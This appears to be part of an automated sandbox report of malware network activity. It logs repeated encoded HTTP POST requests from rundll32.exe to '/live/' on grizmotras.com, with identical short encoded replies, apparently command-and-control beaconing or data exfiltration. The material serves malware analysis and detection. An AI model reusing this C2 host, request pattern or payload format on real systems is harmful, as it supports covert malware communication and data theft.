                                                                                                2024-04-26 21:18:54 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:18:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                44192.168.2.549767172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:18:54 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:18:54 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpBMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:00 UTC578INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:00 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EwshMmcf1eJLPtlFu1zxYia625KNyGJwBt53%2Fabrdxq0MthgyEUwvxe0fMfETf7RAiH3maIgCHpK3%2FpJAMA%2BYNowq2clBSe6SjEkNviD8wwOFnNR%2FdSsMrKUvVbdapBtUw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99ba98c8b67c3-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:00 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                45192.168.2.549768172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:00 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:00 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpB8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:04 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFp6IVJG%2F7uBz%2FCVYVbX8JtCf%2BHS1iwSSuunGD0AoRfIJPhhwu4jPQYO%2FqjrbGy8AFYTdBxjDeAnuy9yinwcsVC2QPSDEqT7SYcQXbBZBGXaM7LPmpgzW7lLO%2BQF8lneJA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99bce7ad6a698-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:04 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                46192.168.2.549769172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:04 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:04 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 42 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpBsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:08 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:08 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BfBiHs%2BqEhDCfqZH1ZLxofo3EfClIPmRM%2FlFDeZ4qrDvaTukE4jtu5Y89iFleqUHz6FbW7lzbibHKiElYrxjxB%2FMnekmSc%2FfNzW2rp6I3dkfEtuXrMroNNS5McEEizKcrg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99be78b373361-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:08 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                47192.168.2.549770172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:09 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:09 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpAcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:14 UTC576INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YcijgRUaem2cxUJYrDyL4Lo1oswOaZoacTuZNQ5zPEbnTViMV1TydOBUW2vqpw%2FRJ%2FFC75o0Ie8mjOsBnRMI0iqHJID%2Bp3lue8WgXAUnb6xWpz9ovEMT1XNmCqCauJfnlw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c044c7b74a0-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:14 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                48192.168.2.549771172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:14 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:14 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 4d 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpAMnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:19 UTC582INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zmISHXtytZ1o152TZQyvMc3TmrVbB%2BXjNNBMCWqpmRaQ%2Bxs0BbitFKzBNqpBcTtKDcU%2BNwWePEiLii6%2B9HRcdzq%2Fusxfg2MGvng9aOrU%2Bcuj60rSEm6Jqo6QkpeRYcbo4w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c26dd87a668-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:19 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                49192.168.2.549772172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:19 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:19 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 38 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpA8nRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:23 UTC574INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:23 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aFS8y4yv4RhoKAh8E9euUEv6v0IbFNQf7vzUtDgcWIywoybVxMq3MzvK0g5nDT5sXSxEWlFvh5o537QMvW2PjOaev6Baybu8Wx2Q8OAX74ksuVsgHa2%2FsQlylpgYPqZ%2FFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c472e0609c6-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:23 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                50192.168.2.549773172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:23 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:23 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 41 73 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpAsnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:27 UTC586INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:27 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m%2FajbxOg0gWAvfnVeMhmSrVu10wsgIyGz%2F%2BvqiQhr%2FQGg19768w3s%2B8P%2BwnSUsRI4G9h9aNdnpN68%2B9t9brsY0f0bShVIXMYsmXLvbrthkzmPY%2FV1XorCNl4OUQwgxdF5A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c600f23a663-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                2024-04-26 21:19:27 UTC118INData Raw: 37 30 0d 0a 51 68 43 75 50 41 36 38 73 77 56 57 50 37 72 33 4e 38 65 58 43 4f 73 53 32 63 6d 32 52 55 78 34 6a 6a 6a 77 71 35 7a 38 41 43 58 4c 42 76 2b 63 79 6e 6b 43 33 6f 36 71 32 35 4d 52 31 6a 36 77 45 2b 33 30 53 2f 64 56 49 4a 31 51 6c 4a 4f 65 62 75 58 6f 35 73 62 75 4d 32 44 4a 63 52 50 5a 70 44 35 69 48 42 72 58 61 53 4e 67 34 4d 68 75 0d 0a
                                                                                                Data Ascii: 70QhCuPA68swVWP7r3N8eXCOsS2cm2RUx4jjjwq5z8ACXLBv+cynkC3o6q25MR1j6wE+30S/dVIJ1QlJOebuXo5sbuM2DJcRPZpD5iHBrXaSNg4Mhu
                                                                                                2024-04-26 21:19:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                51192.168.2.549774172.67.219.28443180C:\Windows\System32\rundll32.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                2024-04-26 21:19:28 UTC227OUTPOST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: grizmotras.com
                                                                                                Content-Length: 180
                                                                                                Cache-Control: no-cache
                                                                                                2024-04-26 21:19:28 UTC180OUTData Raw: 59 6a 4f 65 45 79 69 4d 6b 33 52 70 44 63 6e 52 41 75 53 4f 42 61 5a 63 79 73 69 76 55 6b 73 52 6d 57 37 41 2b 39 36 69 4c 52 4f 42 58 72 71 48 6b 53 46 58 77 4e 72 77 6c 62 49 47 6e 51 7a 63 65 65 4f 66 45 61 6c 61 64 64 38 43 68 5a 4c 48 4b 66 65 70 70 63 54 71 50 6d 44 47 66 68 76 49 74 7a 78 68 46 31 72 56 63 33 4e 69 76 61 6f 52 75 45 55 48 45 51 77 63 77 52 4f 61 71 42 42 73 58 59 43 73 73 4e 76 38 41 58 58 56 4f 56 58 6f 4f 76 44 36 43 57 32 6a 38 30 68 6a 38 71 53 76 73 4b 75 70 61 55 4a 4a 31 44 63 39 73 78 79 56 48 48 75 57
                                                                                                Data Ascii: YjOeEyiMk3RpDcnRAuSOBaZcysivUksRmW7A+96iLROBXrqHkSFXwNrwlbIGnQzceeOfEaladd8ChZLHKfeppcTqPmDGfhvItzxhF1rVc3NivaoRuEUHEQwcwROaqBBsXYCssNv8AXXVOVXoOvD6CW2j80hj8qSvsKupaUJJ1Dc9sxyVHHuW
                                                                                                2024-04-26 21:19:38 UTC580INHTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:19:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eQ8QZEEaT4%2FJmbQvAI8mVoto%2BNbXir6dIRs5drsxSZdJNsdII4qRzof0NgU04dNrM8c1qNWxM%2B6NaBOocVZK1zDHLcTUR1hoPcm0dP9LMe0z%2BIX4xz%2BlBsalgSAoQ7EjOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a99c79fc72a55e-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
